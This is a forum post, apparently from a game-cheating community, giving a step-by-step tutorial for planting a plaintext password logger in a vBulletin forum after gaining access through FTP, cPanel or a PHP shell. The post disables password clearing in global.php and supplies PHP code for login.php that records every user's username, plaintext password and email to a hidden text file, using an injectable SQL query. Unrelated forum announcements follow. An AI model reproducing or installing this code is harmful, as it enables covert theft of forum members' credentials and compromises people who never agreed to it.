Jump to content

Recommended Posts

Posted

vBulletin Password Logging

in this tutorial i will show you how to implement a plaintext password logger on a vBulletin Forum.

 

So Let's Start.

 

===============================================

Need: access to the site - ftp, cPanel, PHP Shell etc.

===============================================

1. open global.php which is located in the forum directory

Look For:

code:

$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;

and change it to:

Code:

//$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;

 

2. now open login.php which is in the same directory as global.php

Look For:

Code:

process_new_login

and paste this under it:

$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
  $lg_password = $vbulletin->GPC["vb_login_password"];
  $lg_file = "./includes/passwords.txt";
  $sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
  
  while($row = @mysql_fetch_array($sql_query))
  {
  
     if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
     {
        $fp1 = @fopen($lg_file, "a+");
        @fwrite($fp1, $lg_username . ' : ' .  $lg_password." (" . $row["email"] . ")\n");
        @fclose($fp1);
        $f = @file($lg_file);
        $new = array_unique($f);
        $fp = @fopen($lg_file, "w");
        foreach($new as $values)
        {
           @fputs($fp, $values);
        }
        @fclose($fp);
     }
  }

 

 

 

Regards

~ flAmingw0rm

 

  • 1 month later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now


  • Posts

    • Hello everyone, We’re happy to announce that Top.MaxCheaters.com has officially opened! Top.MaxCheaters.com is a brand-new Lineage 2 Top Listing website, created to give L2 servers a clean, fair, and simple way to gain visibility. 🔹 What we offer Lineage 2–focused top listing Simple and fast server submission Clean and modern design No voting system Equal exposure for all servers The project is part of the MaxCheaters.com network and is built specifically for the Lineage 2 community. All Lineage 2 servers are welcome — including Interlude, High Five, Classic, Essence, and custom projects. 🔗 Website 👉 https://Top.MaxCheaters.com This is just the beginning. Improvements and new features will be added over time. Thank you for your support, MaxCheaters.com Team
    • Hello everyone, We’re happy to announce that Top.MaxCheaters.com has officially opened! Top.MaxCheaters.com is a brand-new Lineage 2 Top Listing website, created to give L2 servers a clean, fair, and simple way to gain visibility. 🔹 What we offer Lineage 2–focused top listing Simple and fast server submission Clean and modern design No voting system Equal exposure for all servers The project is part of the MaxCheaters.com network and is built specifically for the Lineage 2 community. All Lineage 2 servers are welcome — including Interlude, High Five, Classic, Essence, and custom projects. 🔗 Website 👉 https://Top.MaxCheaters.com This is just the beginning. Improvements and new features will be added over time. Thank you for your support, MaxCheaters.com Team  
    • Sharing https://iperfect.dev/ <div><h1>⚠️ DevTools Detected</h1><p>Please close developer tools to view this page.</p></div> who does that // Console warning message console.clear(); console.log('%câš ï¸� STOP!', 'color: red; font-size: 48px; font-weight: bold;'); console.log('%cThis is a protected website. Unauthorized copying is prohibited.', 'color: #333; font-size: 16px;'); console.log('%c© iPerfect — All rights reserved', 'color: #666; font-size: 12px;'); you open the website means (you copy his files in your browser) you are right away tresspassing    https://maxcheaters.com/search/?q=iperfect&quick=1      https://limewire.com/d/CqJOa#weyDvJazQ1    why robbing people from ctrl+u? whats wrong with you  
    • TILL OPENING LEFT -  3 DAYS ! NEW SEASON STARTS FROM - 23/01/2026, FRIDAY, 20:00 +3 GMT !
  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock